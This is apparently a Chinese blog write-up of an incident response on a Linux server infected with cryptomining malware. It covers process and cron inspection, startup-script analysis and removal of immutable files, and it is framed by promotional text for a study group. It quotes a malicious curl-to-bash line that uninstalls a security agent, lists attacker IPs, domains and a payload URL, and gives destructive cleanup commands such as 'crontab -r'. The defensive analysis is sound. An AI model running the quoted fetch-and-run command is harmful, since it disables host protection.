写在最后
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。
需要完整版PDF学习资源私我
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
一次安全应急过程,发现大量的恶意脚本和挖矿文件包括-bash和sysdrr等明显特征病毒家族的文件,然后发现竟然删除不了恶意文件,提示“Operation not permitted” 不允许操作。此情此景,只好掏出祖传的安全应急手册,终于找到破解之法。
一、 top 命令查看进程
通过top查看,发现有一个-bash进程消耗了大量的CPU资源。
二、查看网络连接
通过netstat -anltp查看,发现两个异常进程bashirc和-bash。
尝试使用 kill -9+ 进程号,强制杀死进程后,病毒进程又重启,怀疑设置了定时任务
三、查询不到-bash文件
查看PID目录/proc/31766,可以看到exe被指向了一个被删除了的-bash进程(进程路径/usr/bin/-bash)
ls /proc/31766/ -lh
查看PID目录/proc/28552,可以看到exe被指向了一个/tmp/-python
ls /proc/28552/ -lh
可以查到恶意进程bashirc
ps -ef | grep bashirc
Look look这个bashirc和-python在干啥,在下载恶意代码的文件和调用masscan扫描内网:
看看http://5.42.67.3/2.gif、http://dw.c4kdeliver.top/2.gif是下载个啥:
这时给目录赋权、修改文件属性防止被删除、还套娃下载quartz_uninstall.sh内容如下:
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
四、查看定时任务
列出所有的定时任务,又是套娃下载,由于主机已禁用了复制、上传、下载,因此也不能分析这个base64编码的内容了。
crontab -l
五、查看启动项
1)基本上所有sep时间的文件都是被篡改过或投放进来的:
ls /etc/init.d -lh
又是套娃下载:
vi /etc/init.d/linux-d
2)找不到-bash的原因
vi /etc/init.d/pwnring
上面的脚本将/bin/initdr拷贝到/bin/-bash,执行他后删除,并且所有的操作都将操作记录写给了null,隐藏了他在系统内的踪迹,更加确定了我的想法,绝壁是被当矿机了。我们用vim打开这个sysdrr文件,发现里面全是乱码,说明这还不是一个简单的文本脚本文件。
六、grep -r搜索包含特定字符的文件
grep -r 命令的使用也比较简单,只需在命令行中输入grep -r 后面加上要搜索的字符就可以完成搜索,例如:grep -r ‘hello’ 就可以搜索文件中包含hello字符的文件。搜索当前目录中所有文件中的字符串:grep -r ‘keyword’ .
使用grep -r****查询包含恶意域名的文件:
grep -r “dw.c4kdeliver.top” /
七、无法删除文件
1)无法删除启动项中恶意文件
chattr -ia 清除文件属性获取操作权限
使用rm -rf 无法删除文件,提示“Operation not permitted” 不允许操作。
2)lsattr查看文件属性不被修改
属性i #无法对文件进行修改;若对目录设置了该参数,则仅能修改其中的子文件内容而不能新建或删除文件
属性a #仅允许补充(追加)内容,无法覆盖/删除内容(Append Only)
**如果需要删除文件,需要解除ia****属性,**即可删除:
chattr -ia -python
rm -f -python
八、后续建议
1)封堵恶意IP和域名
封禁恶意ip和域名,包括恶意域名dw.c4kdeliver.top,恶意IP包括:104.21.22.218,172.67.207.34,5.42.67.3,87.121.221.176,89.185.85.102,167.71.233.11,51.255.171.23,172.64.80.1,104.21.22.218,217.182.205.238
2)杀死恶意进程
需要杀死恶意进程,不然文件删除可能还会出行。
kill -pid
3)清除定时任务
执行以下命令后,所有用户下面的定时任务会被删除,所以需要注意是不是要全部清除:
crontab -r
4)清除可疑文件
整理一些可疑文件和目录,自行确认是否正常,对于攻击者投放的文件建议全部清除,当然要想把恶意文件全部找出来,可能需要花不少时间,建议找出攻击路径和问题原因后,重置操作系统吧。
5)可疑的文件和存放的目录:
/etc/ld.so.preload
/etc/rc.local/.bash_profilr
/etc/rc.local/.bashrc
/etc/systemd/system/
/etc/systemd/system/linux-d.service
/etc/systemd/system/pwringe.service
/etc/init.d/pwnrig
/etc/init.d/sedWxsep5
/etc/init.d/oanacroner
/etc/cron.d/apache
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!